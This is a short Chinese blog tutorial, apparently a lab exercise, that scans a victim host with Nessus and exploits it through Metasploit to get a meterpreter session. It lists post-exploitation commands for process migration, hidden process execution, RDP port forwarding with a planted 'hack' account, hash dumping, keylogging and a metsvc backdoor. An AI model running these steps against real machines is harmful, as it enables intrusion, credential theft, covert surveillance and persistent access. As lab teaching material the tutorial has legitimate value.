zoukankan      html  css  js  c++  java
  • Nessus+Metasploit

    1、环境

    受害者IP:10.0.0.6

    2、攻击

    首先使用Nessus进行扫描

     

    扫描结果

     

    我们将结果导出来,然后导入msfconsole中

     

    使用vulns进行漏洞分析

     

    查找对应的漏洞

     

    使用漏洞进行攻击

     

    这时候我们就获得了一个meterpreter

    3、控制后门

    测试是否是虚拟机:

     

    迁移进程,防止当前进程被删除

     

     

     

    ps:查看进程

    migrate pid:迁移进程

    execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互

    getpid:获取进程号

    getuid:查看权限

    sysinfo:系统信息

    端口转发

           portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678

           run getgui –u hack –p hack:添加账户

           rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地

     

    获取hash

     

    键盘监听

    keyscan_start:启动监听

    keyscan_stop:停止

    keyscan_dump:查看

      

    后门一:metsvc

     

    然后使用

     

    我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)

  • 相关阅读:
    SDOI2011古代朱文
    LIS 堆优化
    ZR2019 广州 游记
    LG2709 小B的询问
    [SCOI2009] 生日礼物
    [SDOI2008]沙拉公主的困惑
    [LG3396]哈希冲突
    ZROI2018.8.2 菜鸡互啄杯组队 ACM 赛
    ZROI 菜鸡互啄杯 III
    [LG4016] 负载平衡问题
  • 原文地址:https://www.cnblogs.com/BloodZero/p/4463277.html
Copyright © 2011-2022 走看看